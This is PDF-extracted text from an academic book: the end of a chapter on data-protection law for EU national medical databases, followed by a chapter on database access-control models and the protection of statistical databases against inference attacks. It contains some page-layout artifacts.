Exemptions to Certain Obligations and Rights The Directive (Article 13) provides that member states can restrict the scope of obligations and rights given in Articles 6(1), 10, 11(1), 12 (previously discussed) and 21 (relating to the publicising of processing operations) in order to safeguard: national security, defence, public security, the prevention, detection, investigation, and prosecution of crime, economic and financial interests, and the protection of data subjects or the rights and freedom of others.
Compiling Medical Data into National Medical Databases
SOME LEGAL ISSUES Allowability of Linking and the Scope of Utilisation of Nationally Compiled Data Two important issues can be identified with the compilation of national medical databases. The first is allowability of such compilations per se (that is, the linking together of data from previously disparate databases), the other is (provided that the first is positively resolved) the scope of use of such compiled data. The first issue, the mere linking of different databases, is not specifically prohibited by the Directive, but the laws of some EU member states have put an effective ban on the linking itself. For example, in Slovenia it is forbidden to permanently link disparate databases in the public sector (Article 20, Slovenian Personal Data Protection Act 1999). The second issue must be resolved with regard to the Directive, which prohibits data to be used for any other purpose than for the one for which it was collected. This means that there must be a legal basis for the collection, compilation, and use of data on the national level. This special legal basis is usually legislation such as a medical database law. Even in the absence of a linking prohibition, a national medical database can still only be built if it is governed by special law. If such law does not exist, it means that data can be linked or physically aggregated, but it can only be used in such a way as if the data were not linked. We consider three possible solutions for these problems.
Tightly Controlled Use of Compiled Records When national medical databases are compiled, the easiest way to store data is for the data controller to have data (records) kept in an identifiable/personal form. This obviates the need for
costly and sometimes difficult anonymisation processes, it allows for the subsequent quality control of data sets, makes possible further research on raw data, and the addition of new data about individuals. However, tight access controls must then be implemented with permissions to access data for various profiles. Since data are being processed in their personal form, all duties with respect to such processing as set forth in the Directive’s provision must be carried out (e.g., the notification of data subjects).
Anonymisation (De-Identification) of Compiled Data One possible solution for databases holding national medical records used for research and statistical purposes is anonymisation (the viz. de-identification) of data. Anonymised data can be used freely. It does not fall under the scope of the Directive, since it is not deemed personal data. Anonymisation refers to the procedure in which unique identifiers of records are deleted, leaving data that are still individual but that cannot be traced back to any specific individual. Any personal data can be turned into non-personal data by removing unique identifiers. This can be achieved by various means, such as by decoupling data from explicit identifiers (e.g. name compared to an implicit e.g. ID number) and full identifiers (i.e. one that defines an individual uniquely) and then destroying any other identifiers (by removing appropriate parts of individual records which together amount to full identifiers in such a way, that no combination of remained data amounts to full identifier). Where records are merely severed into two parts, one with identifiers and the other with data, which by itself does not refer to identifiable individuals (the so called key-coded data, Lowrance, 1997) this, is not enough for anonymisation. This is according to the EU Directive and member states data protection legislation standards, since
2093
Compiling Medical Data into National Medical Databases
all necessary data for full identification sill lie with the data controller in this case. According to the UK Information Commissioner’s Legal Guidance on The UK Data Protection Act 1998:
What is banned, of course, is linking of personal data, which renders any personal data misuse impossible. It is still possible, however, to link (and use in any way) depersonalized personal data (e.g., for research).
The Commissioner considers anonymisation of personal data difficult to achieve because the data controller may retain the original data set from which the personal identifiers have been stripped to create the “anonymised” data. The fact that the data controller is in possession of this data set which, if linked to the data which have been stripped of all personal identifiers, will enable a living individual to be identified, means that all the data, including the data stripped of personal identifiers, remain personal data in the hands of the data controller and cannot be said to have been anonymised. The fact that the data controller may have no intention of linking these two data sets is immaterial. (Information Commissioner, 2000)
Confidentiality and Protection of Records
The UK Information Commissioner’s concerns are not without foundation because research has shown that data thought to be anonymised have been re-identified by linking or matching such data to other data. For example, Sweeney (2000) was able to re-identify anonymised data by directly linking/matching two data sources (medical data and voter list) on shared attributes (date of birth, zip code, sex). In her later work, Sweeny (2002) concluded that if release information (i.e., anonymised data) is altered to map onto as many people as possible then any linking will be ambiguous and therefore it is less likely that anonymised data can be re-identified.
Prohibition of Compilation (Linking) The most radical solution is to ban the linking altogether, effectively outlawing any medical database with substantial data of various categories.
2094
Due to the fiduciary (trust) relationship that exists between a medical practitioner and a patient, the medical practitioner and associated employees are under a duty of confidence not to disclose medical data provided by a patient unless authorised to do so. This is duty is usually enshrined in law, such as the UK common law of confidence. The directive further enforces the law of confidence (and privacy legislation) by virtue of the first data principle which states that data must be processed (which includes disclosure) lawfully. Authorisation to disclose medical data may be given by explicit consent from a patient or may be allowed under special circumstances prescribed by law. With regard to medical data, The directive (Article 8(3)) states that patient consent is not required where processing (e.g., disclosure) of medical data is needed for preventive medicine, making a diagnosis, and caring or treating patients, provided that the data is processed by a healthcare professional subject to professional secrecy rules under his/her national laws. The confidentiality of medical records is of critical importance for both healthcare workers and data subjects. Disclosure of such data can lead to victimisation, humiliation, social exclusion and prejudicial treatment. Confidentially is particularly relevant to national medical databases because of the fact that medical data can be made available anywhere and anytime. Various studies have shown that the confidentiality and security of medical data are amongst the biggest concerns that healthcare workers and patients have. For example, a study by Health
Compiling Medical Data into National Medical Databases
Which? (2003) concluded that the only barrier to the UK public accepting integrated care records to enable the sharing of medical data (amongst medical personnel and patients) was the perception that electronic systems had security issues. Also Ndeti & George (2005) concluded that the main concerns for UK clinicians and patients regarding IT in primary healthcare were patient confidentiality and the security of electronic records. The UK provides a good example of how the confidentiality of medical records in a database can be managed. In the NHS, confidentiality issues have been addressed by various measures such as the NHS Code of Practice on Confidentiality (Department of Health, 2003) and the Caldicott Principles (developed by the Caldicott Committee chaired by Dame Fiona Caldicott, see Department of Health, 2006). Both of these measures are consistent with the principles and provisions of the directive. The NHS Code of Practice of Confidentiality (Department of Health, 2003), applies to workers within or under contract to NHS organisations. It uses a confidentiality model with four main requirements namely: (i) protecting patient’s information; (ii) informing patients about how their information is used; (iii) providing patients with a choice to decide on disclosure and use of information; and (iv) continually improving the preceding three requirements (protect, inform, choice). The Caldicott Principles were published in 1997 by the Caldicott Committee that was set up to review the transfer of patient-identifiable information between NHS organisations (in England) and non-NHS organisations. The six principles state that (i) the purpose(s) for using confidential information must be justified; (ii) confidential information must only be used when absolutely necessary; (iii) the minimum amount of confidential information required should be used; (iv) access to confidential information should be on a strict and need-to-know basis; (v) everyone must understand his or her responsibilities, and (vi) everyone must understand and comply with the law.
Also in the UK, with reference to the creation of Summary Care Records (SCR) which will eventually form part of the national medical database, the UK Department of Health has proposed specific practices to meet current legal obligations to ensure data protection and confidentiality. All patients are notified before uploading of their SCR and given the option: to decline one; limit the future scope of information in the SCR; or view the contents before uploading. The SCR, however will be uploaded without the explicit consent of the patient (but subject to notification and an opportunity to respond). After uploading, patients can remove any or all information uploaded to the SCR, and any subsequent additions to the SCR must be agreed between the patient and his/her doctor. Patients will also be able to limit the information, which can be made visible without their consent. A wide range of access controls have also been adopted. Only staff with a legitimate relationship with a patient will be able to access that patient’s SCR. This includes medical staff acting in an emergency such as staff working in an accident and emergency department.
Securing an Audit Trail In some countries, an audit trail of all operations with respect to the processing of personal data is required. Such operations include any operation or set of operations defined as processing under the Directive and includes collecting, acquisition, recording, organising, storing, adapting or altering, retrieving, consulting, using, disclosing by transmission, communicating, disseminating, or otherwise making available, aligning or linking, blocking, anonymising, erasing or destroying. Retrieval, in particular, is included in the set of operations for which an audit trail must exist and this can be problematic as it may present a serious hindrance to system performance to monitor and record all retrievals. The hindrance to system performance can be both in terms of the size of space needed to store audit logs and the number
2095
Compiling Medical Data into National Medical Databases
of system cycles dedicated to monitoring. This is especially relevant to national medical databases due to their potentially large size. The Slovenian Data Protection Act, in particular, requires that subsequent determination must be possible of when and by whom individual personal data were entered into a filing system, used or otherwise processed. The storage term for such logs is for the period covered by statutory protection of the rights of individuals due to the unauthorised supply or processing of personal data. In the Slovenian case, all civil claims for the violation of privacy have a statute of limitation of 5 years. The requirement to store log files of every operation for 5 years, with respect to the processing of personal data is an almost overwhelming duty, one that is usually skirted round by Slovenian companies. An audit trail is also sometimes required for a limited set of operations, such as for the transfer of data to third parties. According to the Slovenian Data Protection Act, data controllers are obliged to ensure that for each supply of personal data to third parties, it is subsequently possible to determine which personal data were supplied, to whom, when and on what basis. This is in respect of the period covered by the statutory protection of the rights of data subjects (i.e., 5 years). In the UK, an audit is not mandatory for the retrieval of data from a database. However, with regard to the setting up of the new UK national medical database, part of the procedures for protecting medical data include that all access to an SCR will be via a smartcard and PIN, and is logged, providing an audit log. All patients will be able to receive a copy of the audit log giving details of access to their SCR. The NHS also guarantees that information in the SCR will not be shared with any organisation without the explicit consent of the patient. However, previous smartcards have proved cumbersome—especially since many share or borrow smartcards. It remains to be seen whether audits will capture any abuses and curtail them.
2096
CONCLUSION The technical feasibility of compiling a national medical database from disparate local medical databases and file systems, together with the potential benefits of using a national medical database, may inevitably result in the widespread compilation of such databases. Arguably a national database can improve the quality and scope of a nation’s healthcare services. Some benefits include that it can: facilitate the provision of pervasive healthcare by enabling healthcare professionals to access medical data anytime, anywhere, and “on-demand”; facilitate information sharing across organisational and physical boundaries; provide demographic and epidemiological data for research and clinical purposes; facilitate the standardisation of medical records generally leading to improved data quality and integrity; and help in the management of national medical resources. While national medical databases arguably facilitate an improvement in the access, availability and use of medical data, the potential concerns relating to data protection issues (including the privacy and confidentiality of medical information) remain. In order to address these concerns, there has been much progress in implementing security and access measures such as hardware and software controls, audit trails, and confidentiality policies amongst others. However, the nature of any networked digital infrastructure makes it prone to security breaches, as evidenced by past well publicised breaches of military and financial systems especially in the United States. Further, security breaches may not always be due to unauthorised access, since for example an unscrupulous employee with access to a national medical database may acquire and use medical data for various illegal purposes (such as to sell to private companies). Compared to a local database, there is a greater risk of unauthorised access to a national medical database due to the fact that it can generally be
Compiling Medical Data into National Medical Databases
accessed nationally at anytime, and by multiple users and organisations. Also there is a greater possibility for errors in medical data due to the volume of data handled. A recent UK survey of over 56 million patient records held by general practitioners(GPs) in England and Wales, found evidence for: duplicate registrations; inaccurate and incomplete data capture; errors in medical records; and incomplete transfer of information between systems (Audit Commission, 2006). It is quite possible that such problems (some due to human error and deliberate deception amongst other reasons) may be magnified in a national medical database. Further, the consequences of any illegal or negligent processing of data in a national medical database may have greater consequences for a data subject. This is because an incorrect or inaccurate medical record from a national database can be accessed by multiple healthcare professionals and providers to make decisions regarding a patient (data subject). Correcting errors and inaccuracies on a medical record that has been widely accessed may not always be easy, since incorrect/inaccurate copies of the medical record may exist (and be in use) in many different national organisations at a given time. Invariably the decision regarding the creation and use of a national medical database will involve striking the right balance between the concerns about data protection (including privacy and confidentiality) of medical data, and the benefits (to the public) of sharing such data. Public health considerations and social objectives may heavily tip the balance towards data sharing. This will invariably lead to some erosion of individual privacy and confidentiality (protected in part by EU data protection legislation). The possibility of larger scale compilations of identifiable medical data, such as a regional medical database (for example a European Union medical database) provides even more cause for concern with regard to data protection. This is particularly relevant in light of the EU Commission’s stated aim (outlined in September 2006), to establish
interoperability between member states’ healthcare IT systems, and hence share patients’ medical details between member states (EU Commission, 2006). Indeed in 2007 the EU began issuing calls for reseach proposals (via the Competitiveness and Innovation Framework Programme (CIP)) to investigate how best to achieve its interoperability objective. The concept of a regionally or globally accessible medical database is not new and already exists. For example, the US Armed Forces Health Longitudinal Technology Application (AHLTA) electronic health record system, services over 9 million worldwide patients (servicemen, veterans and their families) most with medical records online (Elenfield & Carraher, 2006) . Given many healthcare research initiatives (e.g., EU Commission, 2006), in-depth studies (e.g., Audit Commission, 2006) together with high level policy decisions, it is inevitable that improvements in technology will continue to drive or enable healthcare change. However, it is important that the consequences of such change are carefully balanced with existing rights especially the rights of individuals in a society. Indeed, the creation of national medical databases in the EU, while beneficial (e.g., for epidemiological and demographic purposes) will continue to raise data protection concerns regarding and security and processing of patient data. Such concerns are well placed especially since (in light of the EU Commission’s stated aims regarding interoperability) EU national medical databases may eventually be linked to a regional EU-wide healthcare infrastructure.
REFERENCES Anderson. (2007). Security of medical information systems. Retrieved from http://www.cl.cam. ac.uk/~rja14/#Med Audit Commission (2006). National duplicate registration initiative. Health National report,
2097
Compiling Medical Data into National Medical Databases
August 2006. Retrieved from http://www. audit-commission.gov.uk/Products/NATIONAL-REPORT/009F4715-3D93-4586-A3A07BF69405A449/NationalDuplicateRegistrationInitiative02Aug06REP.pdf Department of Health. (2006). The Caldicott Guardian Manual 2006. Retrieved from http:// www.connectingforhealth.nhs.uk/systemsandservices/infogov/policy/resources/new_gudance Department of Health. (2003). Confidentiality: NHS Code of Practice. November 2003. Retrieved from http://www.dh.gov.uk/en/Publicationsandstatistics/Publications/PublicationsPolicyAndGuidance/DH_4069253 Department of Health. (2002). Delivering 21st century IT Support for the NHS. National Strategy Programme. Retrieved from http://www.dh.gov. uk/prod_consum_dh/groups/dh_digitalassets/@ dh/@en/documents/digitalasset/dh_4071684. pdf Elenfield, V., & Carraher, J. (2006). Lessons learned in implementing a global electronic health record. Hiss Annual Conference, February 14, 2006. Retrieved from http://www.himss. org/content/files/lessonslearned_imp_ehr.pdf EU Commission. (2006). Connected health: Quality and safety for European citizens.Retrieved from http://ec.europa.eu/information_society/activities/health/docs/policy/connected-health_final-covers18092006.pdf Healthcare Information and Management Systems Society. (2007). EHR, Electronic Health Record. Retrieved from http://www.himss.org/ASP/topics_ehr.asp Health Which? (2003). The public view on electronic health records, health which? And NHS National Programme for Information Technology, 7 October 2003. Retrieved from http://www.dh.gov. uk/prod_consum_dh/groups/dh_digitalassets/@
2098
dh/@en/documents/digitalasset/dh_4055046. pdf Hunter, K. (2002). Electronic health records. In S. Englebardt, & R. Nelson (Eds). Health care informatics, an interdisciplinary approach (pp. 209-230). Mosby. Information Commissioner. (2000). Data Protection Act 1998, Legal Guidance (p14). Retrieved from http://pkl.net/~matt/uni/ct218/other%20u seful%20documents%20(not%20examinable)/ Legal%20Guidance%20on%20DPA.doc Information Commissioner’s Office. (2007). The information commissioner’s view of NHS electronic care records. Retrieved from http:// www.ico.gov.uk/upload/documents/library/ data_protection/introductory/information_commissioners_view_of_nhs_electronic_care_ reco%E2%80%A6.pdf Lowrance, W. (1997). Privacy and health research, A report to the U.S. Secretary of Health and Human Services. Retrieved from http://aspe.os.dhhs. gov/datacncl/phr.htm Ndeti, M., & George, C. E. (2005). Pursuing electronic health: A UK primary health care perspective. In M. Funabashi & A. Grzech (Eds.), Challenges of expanding Internet: E-commerce, e-business, and e-government: Proceedings of the 5th IFIP Conference on e-Commerce, e-Business, and e-Government (I3e’2005), October 28-30 2005, Poznan, Poland, USA: Springer NHS Factsheet. (2005). The spine. Retrieved from http://www.connectingforhealth.nhs.uk/resources/comms_tkjune05/spine_factsheet.pdf Royal Society. (2006). Digital healthcare: The impact of information can communication technologies on health and healthcare. Retrieved from http://www.royalsoc.ac.uk/displaypagedoc. asp?id=23835
Compiling Medical Data into National Medical Databases
Shortliffe, E. H., & Barnett, G. O. M. S. (2001). Medical data: Their acquisition, storage, and use. In E. H. Shortliffe & L. E. Perreault (Eds.), Medical informatics, computer applications in health care and biomedicine (pp. 41-75). Springer. Sweeney, L. (2002). K-anonymity: A model for protecting privacy. International Journal of
Uncertainty, Fuzziness and Knowledge-based systems, 10(5), 557-570. Sweeney, L. (2000). Uniqueness of simple demographics in the U.S. Population. LIDAPWP4, Carnegie Mellon University, laboratory for International Data Privacy, Pittsburgh, PA.
This work was previously published in Ethical, Legal, and Social Issues in Medical Informatics, edited by P. Duquenoy, C. George, and K. Kimppa, pp. 228-248, copyright 2008 by Medical Information Science Reference (an imprint of IGI Global).
2099
2100
Chapter 7.7
Database Security and Statistical Database Security Edgar R. Weippl Secure Business Austria, Austria
INTRODUCTION In this article we will present an introduction to issues relevant to database security and statistical database security. We will briefly cover various security models, elaborate on how data analysis in data warehouses (DWH) might compromise an individual’s privacy, and explain which safeguards can be used to prevent attacks. In most companies, databases are an essential part of IT infrastructure since they store critical business data. In the last two decades, databases have been used to process increasing amounts of transactional data, such as, a complete account of a person’s purchases from a retailer or connection data from calls made on a cell phone. As soon as this data became available from transactional databases and online transactional processing (OLTP) became well established, the next logical step was to use the knowledge contained in the vast amounts of data. Today, data warehouses (DWH) store aggregated data in an optimal way to serve queries related to business analysis.
In recent years, most people have begun to focus their attention on security. Early OLTP applications were mainly concerned with integrity of data during transactions; today privacy and secrecy are more important as databases store an increasing amount of information about individuals, and data from different systems can be aggregated. Thuraisingham (2002) summarizes the requirements briefly as “However, we do not want the information to be used in an incorrect manner.” All security requirements stem from one of three basic requirements: confidentiality (aka secrecy), integrity, and availability (CIA). Confidentiality refers to the requirement that only authorized subjects, that is, people or processes should be permitted to read data. Integrity means that unauthorized modifications must not be permitted. This includes both modifications by unauthorized people and incorrect modification by authorized users. To correctly perform the services requested, the system needs to remain available; a denial-of-service compromises the requirement of availability.
Database Security and Statistical Database Security
Other security requirements may include privacy, non-repudiation, and separation of duties. These requirements are, however, composite requirements that can be traced back to one of the three basic requirements. Privacy, for instance, is the non-disclosure (=confidentiality) of personal data; non-repudiation refers to the integrity of transaction logs and integrity of origin. Throughout this article we will focus only on technical attacks and safeguards and not on social engineering. Social engineering is often the easiest and, in many cases, a very successful attack vector. For an in-depth coverage of social engineering we recommend (Böck, 2007). In Section 2 we cover the most relevant access control models; in Section 3 we provide an overview of security in statistical databases. Finally, in Section 4 we highlight the essentials of securing not only the transactional and the statistical databases but the entire system.
to access which resource and the individual user has no discretion to decide on access rights.
Discretionary Access Control (DAC) In relational database management systems (DBMS), the objects that need to be protected are tables and views. Modern DBMS allow a fine granularity of access control so that access to individual fields of a record can be controlled. By default, a subject has no access. Subjects may then be granted access, which can be revoked anytime. In most systems the creator of a table or a view is automatically granted all privileges related to it. The DBMS keeps track of who subsequently gains and loses privileges, and ensures that only requests from subjects who have the required privileges—at the time the request is executed—are allowed.
Mandatory Access Control (MAC) BACKGROUND Access Control is the most important technique or mechanism for implementing the requirements of confidentiality and integrity. Since databases were among the first large-scale systems in military applications, there is a long history of security models, dating back to the 1960s. The basic principle in all access control models is that a subject is or is not permitted to perform a certain operation on an object. This process is described by the triplet (s, op, o). A security policy specifies who is authorized to do what. A security mechanism allows enforcement of a chosen security policy. One can distinguish between two fundamentally different access control mechanisms: discretionary access control (DAC) and mandatory access control (MAC). In DAC models the user decides which subject is able to access which object to perform a certain operation. In contrast, when using MAC, the system decides who is allowed
Mandatory Access Control is based on systemwide policies that cannot be changed by individual users. Each object in the database is automatically assigned a security class based on the access privileges of the user who created the object. The most widely known implementation of a MAC system is a multi-level security (MLS) system. MLS systems were first described by Bell LaPadula (Bell, 1975) in the 1960s. Each subject, which could either be a user or user program, is assigned a clearance for a security class. Objects are assigned security levels. Security levels and clearances can be freely defined as long as all items are comparable pair-wise. Most common are security classes (i.e., levels and clearances), such as, top secret (TS), secret (S), confidential (C), and unclassified (U). Rules based on security levels and clearances govern who can read or write which objects. Today, there are only a few commercially available systems that support MAC, such as, SELinux or also Oracle DBMS (Version 9 and higher)
2101
Database Security and Statistical Database Security
when the Oracle Label Security (OLS) option is installed. The main reason to use a MAC system is that it prevents inherent flaws of discretionary access control, which are commonly referred to as the Trojan horse problem. The user Alice creates a program and gives Bob INSERT privileges for the table mySecret. Bob knows nothing about this. Alice modifies the code of an executable that Bob uses so that it additionally writes Bob’s secret data to the table mySecret. Now, Alice can see Bob’s secret data. While the modification of the application code is beyond the DBMS’ control, it can still prevent the use of the database as a channel for secret information.
ACCESS CONTROL FOR RELATIONAL DATABASES Role-Based Access Control (RBAC) With RBAC (Sandhu, 2000), system administrators create roles according to the job functions defined in a company; they grant permissions to those roles and subsequently assign users to the roles on the basis of their specific job responsibilities and qualifications. Thus, roles define the authority of users, the competence that users have, and the trust that the company gives to the user. Roles define both, the specific individuals allowed to access objects and the extent to which or the mode in which they are allowed to access the object (see Sandhu & Coyne & Feinstein & Youman, 1996). Access decisions are based on the roles a user has activated (Sandhu & Ferraiolo & Kuhn, 2000). The basic RBAC model consists of four entities: users, roles, permissions, and sessions. A user is a subject who accesses different, protected objects. A role is a named job function that describes the authority, trust, responsibility, and competence of a role member. A permission is an approval for a particular type of access to one or more
2102
objects. Permissions describe which actions can be performed on a protected object and may apply to one or more objects. Both permissions and users are assigned to roles. These assignments, in turn, define the scope of access rights a user has with respect to an object. By definition, the user assignment and permission assignment relations are many-to-many relationships. Users establish sessions during which they may activate a subset of the roles they belong to. A session maps one user to many possible roles, which results in the fact that multiple roles can be activated simultaneously and every session is assigned with a single user. Moreover, a user might have multiple sessions opened simultaneously. Belonging to several roles, a user can invoke any subset of roles to accomplish a given task. In other words, sessions enable a dynamic activation of user privileges (see Sandhu & Coyne & Feinstein & Youman, 1996). We will briefly summarize various properties of the NISTs RBAC model as pointed out by Sandhu et al. (Sandhu & Ferraiolo & Kuhn, 2000). RBAC does not define the degree of scalability implemented in a system with respect to the number of roles, number of permissions, size of role hierarchy, or limits on user-role assignments, etc.
Coexistence with MAC / DAC Mandatory access control (MAC) is based on distinct levels of security to which subjects and objects are assigned. Discretionary access control (DAC) controls access to an object on the basis of an individual user’s permissions and/or prohibitions. RBAC, however, is an independent component of these access controls and can coexist with MAC and DAC. RBAC can be used to enforce MAC and DAC policies, as shown in (Osborn & Sandhu & Munawer, 2000). The authors point out the possibilities and configurations necessary to use RBAC in the sense of MAC or DAC.
Database Security and Statistical Database Security
Levels Defined in the NIST Model of RBAC
•
The NIST Model of RBAC is organized into four levels of increasing functional capabilities as mentioned above: (1) flat RBAC, (2) hierarchical RBAC, (3) constrained RBAC, and (4) symmetric RBAC. These levels are cumulative such that each adds exactly one new requirement. The following subsections will offer a brief presentation of the four levels. The basic principle is that users are assigned to roles (user-role assignment, indicated through the membership association), permissions are assigned to roles (permission-role assignment, indicated through the authorization association) and users gain permissions defined in the role(s) they activate. A user can activate several roles within a session (indicated through the n-ary activation association). As all these assignments are many-to-many relationships; a user can be assigned to many roles and a role can contain many permissions. Flat RBAC requires a user-role review whereby the roles assigned to a specific user can be determined as well as users assigned to a specific role. Similarly, flat RBAC requires a permission-role review. Finally, flat RBAC requires that users can simultaneously use permissions granted to them via multiple roles. Flat RBAC represents the traditional groupbased access control as it can be found in various operating systems (e.g., Novell Netware, Windows NT). The requirements of flat RBAC are obvious and obligatory for any form of RBAC. According to (Sandhu & Ferraiolo & Kuhn, 2000), the main issue in defining flat RBAC is to determine which features to exclude. Hierarchical RBAC supports role hierarchies built using the sub-role and super-role association. A hierarchy defines a seniority relation between roles, whereby senior roles acquire the permissions of their juniors. Role hierarchies may serve three different purposes:
•
Inheritance hierarchies whereby activation of a role implies activation of all junior roles. Activation hierarchies whereby there is no implication of the activation of all junior roles (each junior role must be explicitly activated to enable its permissions in a session); or a combination of both.
Constrained RBAC supports separation of duties (SOD). SOD is a technique for reducing the possibility of fraud and accidental damage. It spreads responsibility and authority for an action or task over multiple users thereby reducing the risk of fraud. Symmetric RBAC adds requirements for permission-role review similar to the user-role review introduced in flat RBAC. Thus, the roles to which a particular permission is assigned can be determined as well as permissions assigned to a specific role. However, implementing this requirement in large-scale distributed systems may be a very complex challenge.
Usage Control According to Bertino et al. (2006), secure data mining is an aspect of secure knowledge management. The authors emphasize the importance of usage control (cf. Park 2004) to implement continuous decisions of whether a resource may or may not be used. Similar to the reference monitor in classical access control, Thuraisingham (2005) proposed to use a privacy controller to “limit and watch access to the DBMS (that access the data in the database).” She sees a privacy constraint as a form of integrity constraint, and proposes to use mechanisms of the DBMS for guaranteeing integrity: “In these techniques, some integrity constraints, which are called derivation rules, are handled during query processing, some integrity constraints, known as integrity rules, are handled during database updates, and some integrity constraints, known as schema rules, are
2103
Database Security and Statistical Database Security
handled during database design.” Thuraisingham (2005)
security: Inference can be used to infer some secret information. A very simple example illustrates how inference causes information leakage: If I know Alice is the oldest employee, I can ask “How many employees are older than X years?” Repeating this process for different values of X until the database returns the value 1 allows us to infer Alice’s age. The first approach to prevent this kind of “attack” is to enforce that each query must return data aggregated from at least N rows, with N being certainly larger than 1 and—in the best case—a
STATISTICAL DATABASE SECURITY A statistical database contains information about individuals, but allows only aggregate queries (such as asking for the average age instead than Bob Simith’s age). Permitting queries that return aggregate results only may seem sufficient to protect an individual’s privacy. There is, however, a new problem compared to traditional database
Figure 1. Security control models (Adam, 1989). Restriction-based protection either gives the correct answer or no answer to a query (top); data may be modified (perturbated) before it is stored in the data warehouse or the statistical database (middle); online perturbation modifies the answers for each query (bottom).
Query
Exact Response Or Denial Statistical Database
Researcher
Query Perturbated Data Perturbated Response Statistical Database
Perturbated Statistical Database
Researcher
Query
Perturbated Response
Statistical Database
2104
Researcher
Database Security and Statistical Database Security
very large number. Yet, unfortunately, this is no real solution. The first step is to repeatedly ask “How many employees are older than X?” until the system rejects the query because the query would return less than N rows. Now one has identified a set of N+1 employees, including Alice, who are older than X; let X=66 at this point. Next, ask “Tell me the sum of ages of all employees who are older than X?” Let result be R. Next, ask “Tell me the sum of ages of all employees who are not called Alice and are older than X?” Let result be RR. Finally, subtract RR from R to obtain Alice’s age. For an in-depth description we recommend (Castano, 1996).
Restriction-Based Techniques The technique will protect against the aforementioned inference attacks by restricting queries that could reveal confidential data on individuals (Castano, 1996).
Query Set Size Control Enforcing a minimum set size for returned information does not offer adequate protection for information as we explained in Section 3’s introductory example. Denning (Denning, 1982) described trackers that are sequences of queries
that are all within the size limits allowed by the database; when combined with AND statements and negations, information on individuals can be inferred. While simple trackers require some background information (for instance, Alice is the only female employee in department D1 who is older than 35), general trackers (Schlörer, 1980), (Denning, 1979) can be used without in-depth background knowledge.
An Audit-Based Expanded Query Set Size Control The general idea of this control is to store an “assumed information base,” that is, to keep a history of all the requests issued by the user. It is also referred to as query set overlap control (Adam, 1989). The system has to calculate all possible inferences (= assumed information base) that could be created based on all queries the user issued; for each new query it has to decide whether the query could be combined with the assumed information base to infer information that should remain confidential.
Perturbation-Based Techniques Perturbation-based techniques are characterized by modifying the data so that privacy of individuals can still be guaranteed even if more
Figure 2. Generic architecture of data flows to a data warehouse
Source Data Layer
Data Transformation Layer
Reporting Data Warehouse Layer
2105
Database Security and Statistical Database Security
detailed data is returned than in restriction-based techniques. Data can be modified in the original data or in the results returned.
Data Swapping Data is exchanged between different records so that no original data remains but in a way that the calculated statistics are not impacted.
Random Sample Queries Set of answers to a specific query are created dynamically so that not all relevant data items are included in the answer. Instead, a random subset is returned. Since the user cannot decide how this random sample is drawn, inference attacks are much harder. If issuing similar queries, the attacker can attempt to remove the sampling errors. These attacks are possible for small data sets; large data sets can be adequately protected by using random sample queries.
Fixed Perturbation (Modify Data) Unlike the random sample query approach, data modifications and selections are not performed dynamically for each query. Instead, data is modified (though not swapped) as soon as it is stored in the database. The modifications are performed in such a way that they do not significantly influence statistical results.
Query-Based Perturbation In contrast to fixed perturbation, query-based perturbation modifies data—as the name suggests—for each query dynamically. The advantage is that the amount of perturbation, and thus the accuracy, can be varied individually for different users. More trustworthy users can receive more precise results.
2106
FUTURE TRENDS According to Mukherjee et al. (2006), the problem with perturbation techniques is that Euclideandistance-based mining algorithms no longer work well, i.e. distances between data points cannot be reconstructed. The authors propose to use Fourier-related transforms to obscure sensitive data which helps to preserve the original distances at least partly. Another approach proposed by DomingoFerrer et al (2006) is to aggregate data from the original database in small groups. Since this aggregation is done prior to publishing the data the data protector can decide how large such a “micro” group should be.
CONCLUSION In the previous section we gave a detailed introduction to access control and focused on role-based access control. RBAC is currently the dominant access control model for database systems. While access control is certainly one of the most fundamental mechanisms to ensure that security requirements, such as, confidentiality, integrity, and—at least to some extent—availability are implemented, there are several other aspects that need to be considered, too. Figure 2 shows how data is extracted from the source databases, transformed and loaded into the data warehouse. It may then be used for analysis and reporting. The transactional database can be secured with the “classical” models of database security such as RBAC or even mandatory access control. Research in this area dates back to the early times of (military) databases in the 1960s. Once data is extracted, transformed and loaded into a DWH, the data will be used in data analysis–this is what a DWH is created for in the first place. DWH security and methods of statistical database security are then used to se-
Database Security and Statistical Database Security
cure the DWH against attacks such as inference. Nonetheless, overall security can be achieved only by securing all possible attack vectors and not only the operational database (source data) and the DWH itself. It is essential to secure all of the servers including remote, file, and physical access and to thoroughly understand all communication and transformation processes. Attacks could be launched before or after data is transformed, when it is stored in the data warehouse, or when being retrieved.
REFERENCES Adam, N. R. , Worthmann, J. C. (1989). Security-control methods for statistical databases: a comparative study. ACM Comput. Surv., 21, 4, 515-556. Retrieved December, 1989, from http:// doi.acm.org/10.1145/76894.76895 Bell, D., Padula, L. L.(1975). Secure Computer System: Unified Exposition and Multics interpretation. The MITRE Corporation. Bertino, E.; Latifur R.K.; Sandhu, R. & Thuraisingham, B., Secure Knowledge Management: Confidentiality, Trust, and Privacy. IEEE Transactions on Systems, Man, and Cybernetics, Part A: Systems and Humans, 2006, 36, 429-438 Böck, B., Klemen, M., Weippl, E.R. (2007). Social Engineering, accepted for publication in: The Handbook of Computer Networks.
Domingo-Ferrer, J.; Martinez-Balleste, A.; Mateo-Sanz, J. M. & Sebe, F., Efficient multivariate data-oriented microaggregation. The VLDB Journal, 2006, 15, 355-369 Mukherjee, S.; Chen, Z. & Gangopadhyay, A. (2006). A privacy-preserving technique for Euclidean distance-based mining algorithms using Fourier-related transforms. The VLDB Journal, 15, 293–315. Park, J. & Sandhu, R., The UCONABC usage control model. ACM Transactions on Information Security, ACM Press, 2004, 7, 128-174 Sandhu, R., Ferraiolo, D., Kuhn, R. (2000). The NIST Model for Role-based Access Control: Towards a Unified Standard. Proceedings of 5th ACM Workshop on Role-Based Access Control, 47-63. Schlörer. (1980, December). Disclosure from statistical databases: Quantitative Aspects of Trackers. ACM Transactions on Database Systems, 5(4). Sandhu, R. S., Coyne, E. J.,Feinstein, H. L., Youman, C. E. (1996). Role-based access control models. IEEE Computer, 29(2), 38– 47. Retrieved February, 1996, from http://csdl.computer.org/ comp/mags/co/1996/ 02/r2toc.htm Sandhu, R.S., Ferraiolo, D., Kuhn, R. (2000, July). The nist model for role-based access control: Towards a unified standard. Proc. of 5th ACM Workshop on Role-Based Access Control.
Thuraisingham, B., Data Mining, National Security, Privacy and Civil Liberties, SIGKDD Explorations. Volume 4, Issue 2, 2002, 4, 1-5
Denning, D. E., Denning, P. J. (1979). The tracker: a threat to statistical database security. ACM Transactions on Database Systems 4(1), 76-96. Retrieved March, 1979, from http://doi.acm. org/10.1145/320064.320069
